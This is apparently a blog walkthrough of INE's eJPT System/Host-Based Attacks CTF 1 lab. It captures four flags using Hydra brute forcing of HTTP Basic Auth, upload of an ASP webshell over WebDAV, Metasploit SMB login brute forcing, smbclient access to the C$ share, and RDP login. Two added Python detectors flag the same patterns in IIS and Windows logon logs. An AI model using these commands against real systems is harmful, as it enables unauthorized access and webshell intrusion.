Host & Network Penetration Testing: System-Host Based Attacks CTF 1 — eJPT (INE)
Published 2026-6-5 06:40:13 · Source: infosecwriteups.com

A walkthrough covering HTTP brute-forcing, WebDAV exploitation, and SMB enumeration to capture all four flags

Suraj Apar

Hello everyone! 👋

In this blog, I’ll walk through the System/Host-Based Attacks CTF 1 from INE’s eJPT path and explain how I approached each flag. The focus is on methodology and reasoning — not just dropping commands.

This lab has two Windows targets: target1.ine.local and target2.ine.local. The goal is to capture four flags hidden across both machines using system and host-based attack techniques.

Useful files provided by the lab:

/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/webshells/asp/webshell.asp

So, let’s dive in.

Q. User ‘bob’ might not have chosen a strong password. Try common passwords. (target1.ine.local)

As usual, I started with an Nmap scan to identify the running services.

nmap -sV -sC -T5 target1.ine.local


Nmap scan results

The scan showed that port 80 was open running Microsoft IIS 10.0, but it returned a 401 Unauthorized — meaning it was protected by HTTP Basic Authentication. Ports 135, 139, 445 (SMB), and 3389 (RDP) were also open.

I navigated to http://target1.ine.local in the browser and it immediately asked for credentials.


The site was asking for authentication.

Since the question already hinted that Bob might have a weak password, I decided to brute-force his password using Hydra and a common password list.

hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get /


Hydra Result

Hydra successfully identified Bob’s password.

Now I had valid credentials. I logged in, but I didn’t find anything useful on the homepage, so I moved on to directory enumeration with DIRB.

dirb http://target1.ine.local -u bob:<password>


DIRB Result

DIRB found two directories — /aspnet_client/ and /webdav/. The WebDAV directory was listable, so I navigated straight to it: http://target1.ine.local/webdav/


And there it was — flag1.txt sitting right in the directory listing.

Q. Valuable files are often on the C:\ drive. Explore it thoroughly. (target1.ine.local)

Since WebDAV was open and writable, I first ran DAVTest to check which file types the server would accept and execute:

davtest -auth bob:<Password> -url http://target1.ine.local/webdav


.asp files were both uploadable and executable — exactly what I needed, since the lab provides a pre-built ASP webshell.

I used Cadaver (a command-line WebDAV client) to upload it:

cadaver http://target1.ine.local
dav:/> cd webdav
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp


After uploading the shell, I accessed it from the browser.

http://target1.ine.local/webdav/webshell.asp

The shell executed successfully and allowed command execution on the target.


From there, I started enumerating the contents of the C:\ drive.


The C: drive listing came back — and flag2.txt was sitting right there in the root.
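Both the Hydra run against Basic Auth and the WebDAV upload of an .asp file leave a distinctive trace in the IIS W3C log. As an added example (not from the original post or the lab), the following Python reads a constructed log in that format and flags a burst of 401s for one client/account pair and any accepted PUT/MOVE/COPY of an IIS-executable extension; the field names follow the IIS W3C header, and the sample addresses and thresholds are assumptions.

```python
"""Detection over IIS W3C logs: Basic-auth brute force and WebDAV webshell upload."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in IIS W3C format (not captured from the lab); times are UTC.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2026-06-05 06:40:01 GET / - 10.10.1.5 401
2026-06-05 06:40:01 GET / bob 10.10.1.5 401
2026-06-05 06:40:02 GET / bob 10.10.1.5 401
2026-06-05 06:40:02 GET / bob 10.10.1.5 401
2026-06-05 06:40:03 GET / bob 10.10.1.5 401
2026-06-05 06:40:03 GET / bob 10.10.1.5 401
2026-06-05 06:40:04 GET / bob 10.10.1.5 200
2026-06-05 06:41:10 PUT /webdav/webshell.asp bob 10.10.1.5 201
2026-06-05 06:41:20 GET /webdav/webshell.asp bob 10.10.1.5 200
2026-06-05 07:00:00 GET / alice 10.10.1.9 200
"""

EXEC_EXT = (".asp", ".aspx", ".asa", ".cer", ".asax")  # extensions IIS may execute
WRITE_METHODS = {"PUT", "MOVE", "COPY"}                 # WebDAV methods that create files

def parse_iis(text):
    """Yield one dict per request, mapping columns via the #Fields header ('-' = empty)."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def detect(text, max_401=5, window=timedelta(seconds=60)):
    """Return alerts: 401 bursts per (client, account) and accepted writes of executables."""
    alerts, failures = [], defaultdict(list)
    for r in parse_iis(text):
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        key = (r["c-ip"], r["cs-username"])
        if r["sc-status"] == "401":
            failures[key].append(ts)
            failures[key] = [t for t in failures[key] if ts - t <= window]  # sliding window
            if len(failures[key]) == max_401:  # fire once, when the threshold is reached
                alerts.append(("http_bruteforce", r["c-ip"], r["cs-username"]))
        if (r["cs-method"] in WRITE_METHODS and r["sc-status"].startswith("2")
                and r["cs-uri-stem"].lower().endswith(EXEC_EXT)):
            alerts.append(("webdav_exec_upload", r["c-ip"], r["cs-uri-stem"]))
    return alerts
```

Pointing the parser at a real IIS log requires only that the header names match; a PUT of an executable that the server accepts with 2xx is worth alerting on even without a preceding brute force.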

Q. SMB shares might contain hidden files. Check the available shares. (target2.ine.local)

The question hinted toward SMB enumeration, so I started with another Nmap scan.


No web server this time. But port 445 (SMB) and port 3389 (RDP) were both open — running Windows Server 2008 R2–2012.

I used Metasploit’s smb_login module to brute-force the Administrator account:

use auxiliary/scanner/smb/smb_login
set rhost target2.ine.local
set SMBUser administrator
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set verbose false
run


Got it on the first run.

With valid credentials, I listed the available SMB shares:

smbclient -L //target2.ine.local -U administrator


Several shares came back — ADMIN$, C$, IPC$, Shared, Shared2, Shared3. The C$ administrative share looked most interesting, so I connected to it:

smbclient //target2.ine.local/C$ -U administrator


Right there in the C: drive root — flag3.txt.

Q. The Desktop directory might have what you’re looking for. Enumerate its contents. (target2.ine.local)

Still in the same smbclient session, the hint was straightforward — check the Desktop:

smb: \> ls .\Users\Administrator\Desktop\


Inside the Desktop folder, I found the fourth flag.

Bonus: RDP Access

Since port 3389 was open and I had valid Administrator credentials from the SMB brute-force, I couldn’t resist trying RDP:

xfreerdp /u:administrator /p:<Password> /v:target2.ine.local:3389


RDP access

Accepted the self-signed certificate and got a full Windows Server desktop. Complete access — no further exploitation needed.
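The smb_login brute force and the later RDP logon with the same Administrator password would show up in the target’s Security log as a run of 4625 failures followed by 4624 successes. As an added example (not part of the original post), this Python correlates constructed events in that shape: a network logon (type 3, as SMB produces) that follows a burst of failures from the same source for the same account, and a later RemoteInteractive logon (type 10, RDP) from that same source with the guessed account; the flattened event layout and sample addresses are assumptions.

```python
"""Correlate Windows 4625/4624 events: SMB password guessing, then RDP with the guessed creds."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not captured from the lab), flattened as a SIEM would store them.
# 4625 = failed logon, 4624 = successful logon; LogonType 3 = network (SMB), 10 = RDP.
EVENTS = [
    {"EventID": 4625, "Time": "2026-06-05 06:50:00", "User": "administrator", "Ip": "10.10.1.5", "LogonType": 3},
    {"EventID": 4625, "Time": "2026-06-05 06:50:00", "User": "administrator", "Ip": "10.10.1.5", "LogonType": 3},
    {"EventID": 4625, "Time": "2026-06-05 06:50:01", "User": "administrator", "Ip": "10.10.1.5", "LogonType": 3},
    {"EventID": 4625, "Time": "2026-06-05 06:50:01", "User": "administrator", "Ip": "10.10.1.5", "LogonType": 3},
    {"EventID": 4624, "Time": "2026-06-05 06:50:02", "User": "administrator", "Ip": "10.10.1.5", "LogonType": 3},
    {"EventID": 4624, "Time": "2026-06-05 06:55:30", "User": "administrator", "Ip": "10.10.1.5", "LogonType": 10},
    {"EventID": 4624, "Time": "2026-06-05 08:00:00", "User": "svc_backup", "Ip": "10.10.1.20", "LogonType": 3},
]

def analyse(events, min_failures=3, window=timedelta(minutes=10)):
    """Return alerts: a type-3 success right after a failure burst, and any later
    type-10 (RDP) logon from the same source with the same guessed account."""
    failures, suspect, alerts = defaultdict(list), set(), []
    for e in sorted(events, key=lambda e: e["Time"]):  # ISO timestamps sort as strings
        ts = datetime.strptime(e["Time"], "%Y-%m-%d %H:%M:%S")
        key = (e["Ip"], e["User"].lower())
        if e["EventID"] == 4625:
            failures[key].append(ts)
            continue
        if e["EventID"] != 4624:
            continue
        recent_fail = [t for t in failures[key] if ts - t <= window]
        if e["LogonType"] == 3 and len(recent_fail) >= min_failures:
            alerts.append(("smb_bruteforce_success", *key, len(recent_fail)))
            suspect.add(key)  # these credentials are now presumed guessed
        elif e["LogonType"] == 10 and key in suspect:
            alerts.append(("rdp_with_guessed_creds", *key))
    return alerts
```

Lockout policy stops the first pattern long before the fourth guess; the second pattern is the one to watch when a guessed password is reused on another service.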

Final Thoughts

This CTF is a solid exercise in chaining simple techniques together. No complex exploits — just weak passwords, a misconfigured WebDAV server, and an exposed SMB share doing all the damage.

The big lesson here: credentials are everything. Both targets fell because of weak passwords. Once you have valid credentials, the rest is just enumeration. And the same Administrator password that cracked SMB also opened RDP — a reminder that credential reuse is one of the most reliable pivot points in any engagement.

Thanks for reading!


Article source: https://infosecwriteups.com/host-network-penetration-testing-system-host-based-attacks-ctf-1-ejpt-ine-9cca24e33039?source=rss----7b722bfd1b8d---4